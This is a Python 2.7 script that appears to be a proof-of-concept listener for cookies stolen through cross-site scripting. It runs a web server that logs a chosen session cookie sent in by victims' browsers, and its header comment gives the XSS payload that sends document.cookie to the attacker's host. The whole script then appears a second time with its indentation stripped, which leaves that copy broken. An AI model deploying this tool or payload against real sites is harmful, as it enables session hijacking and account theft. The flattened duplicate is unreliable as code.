johnnykv/CookieMonster.py

## CookieMonster.py
#Johnny Vestergaard - 2012
#jkv@unixcluster.dk
#POC: Webserver accepting cookies gathered from a website using XSS.
#requires Python 2.7
#
#Expected input is a GET request containing document.cookie, example:
# /PHPSESSID=mu7kbumqj7d4qf5ug3h7n89gs4;%20acopendivids=phpbb2,redmine;%20acgroupswithpersist=nada
#
#javescript used in the example:
#<script>javascript:img=new Image();img.src="http://10.0.0.20/"+document.cookie;</script>

import BaseHTTPServer
import argparse

cookieName = ""

class Handler(BaseHTTPServer.BaseHTTPRequestHandler):
	def do_GET(self):
		cookiesDict = {}
		for item in self.path[1:].split(';'):
			if '=' in item:
				key, val = item.split('=')
				key = key.lstrip('%20')
 				cookiesDict[key] = val
		client =  self.client_address[0]
		#the cookie we want logged
		if cookiesDict.has_key(cookieName):
			cookie = cookiesDict.get(cookieName)
			print "[%(cl)s] Cookie received: %(co)s" % {'cl': client, 'co': cookie}
		else:
			print "[%(cl)s] Cookie not found!" % {'cl': client}
		self.send_error(404, "File not found")

	#just suppressing log messages...
	def log_message(self, format, *args):
		return

monster ="""
                .---. .---.
               :     : o   :    me want cookie!
           _..-:   o :     :-.._    /
       .-''  '  `---' `---' "   ``-.
     .'   "   '  "  .    "  . '  "  `.
    :   '.---.,,.,...,.,.,.,..---.  ' ;
    `. " `.                     .' " .'
     `.  '`.                   .' ' .'
      `.    `-._           _.-' "  .'  .----.
        `. "    '"--...--"'  . ' .'  .'  o   `.
        .'`-._'    " .     " _.-'`. :       o  :
  jgs .'      ```--.....--'''    ' `:_ o       :
    .'    "     '         "     "   ; `.;";";";'
   ;         '       "       '     . ; .' ; ; ;
  ;     '         '       '   "    .'      .-'
  '  "     "   '      "           "    _.-'
"""

parser = argparse.ArgumentParser(description='Cookie XSS Monster.')
parser.add_argument('-p', dest="listenPort", metavar="port", type=int, nargs=1,
										help='port to listen on', required=True)
parser.add_argument('-c', dest="cookieName", metavar="cookie", type=str, nargs=1,
										help='name of cookie to drop', required=True)
args = parser.parse_args()
listenPort = args.listenPort[0]
cookieName = args.cookieName[0]

httpd = BaseHTTPServer.HTTPServer(("", listenPort), Handler)
print monster
print "Chewing '%(c)s' cookies on port %(p)s" % {'c' : cookieName, 'p':str(listenPort)}
httpd.serve_forever()
	#Johnny Vestergaard - 2012
	#jkv@unixcluster.dk
	#POC: Webserver accepting cookies gathered from a website using XSS.
	#requires Python 2.7
	#
	#Expected input is a GET request containing document.cookie, example:
	# /PHPSESSID=mu7kbumqj7d4qf5ug3h7n89gs4;%20acopendivids=phpbb2,redmine;%20acgroupswithpersist=nada
	#
	#javescript used in the example:
	#<script>javascript:img=new Image();img.src="http://10.0.0.20/"+document.cookie;</script>

	import BaseHTTPServer
	import argparse

	cookieName = ""

	class Handler(BaseHTTPServer.BaseHTTPRequestHandler):
	def do_GET(self):
	cookiesDict = {}
	for item in self.path[1:].split(';'):
	if '=' in item:
	key, val = item.split('=')
	key = key.lstrip('%20')
	cookiesDict[key] = val
	client = self.client_address[0]
	#the cookie we want logged
	if cookiesDict.has_key(cookieName):
	cookie = cookiesDict.get(cookieName)
	print "[%(cl)s] Cookie received: %(co)s" % {'cl': client, 'co': cookie}
	else:
	print "[%(cl)s] Cookie not found!" % {'cl': client}
	self.send_error(404, "File not found")

	#just suppressing log messages...
	def log_message(self, format, *args):
	return

	monster ="""
	.---. .---.
	: : o : me want cookie!
	_..-: o : :-.._ /
	.-'' ' `---' `---' " ``-.
	.' " ' " . " . ' " `.
	: '.---.,,.,...,.,.,.,..---. ' ;
	`. " `. .' " .'
	`. '`. .' ' .'
	`. `-._ _.-' " .' .----.
	`. " '"--...--"' . ' .' .' o `.
	.'`-._' " . " _.-'`. : o :
	jgs .' ```--.....--''' ' `:_ o :
	.' " ' " " ; `.;";";";'
	; ' " ' . ; .' ; ; ;
	; ' ' ' " .' .-'
	' " " ' " " _.-'
	"""

	parser = argparse.ArgumentParser(description='Cookie XSS Monster.')
	parser.add_argument('-p', dest="listenPort", metavar="port", type=int, nargs=1,
	help='port to listen on', required=True)
	parser.add_argument('-c', dest="cookieName", metavar="cookie", type=str, nargs=1,
	help='name of cookie to drop', required=True)
	args = parser.parse_args()
	listenPort = args.listenPort[0]
	cookieName = args.cookieName[0]

	httpd = BaseHTTPServer.HTTPServer(("", listenPort), Handler)
	print monster
	print "Chewing '%(c)s' cookies on port %(p)s" % {'c' : cookieName, 'p':str(listenPort)}
	httpd.serve_forever()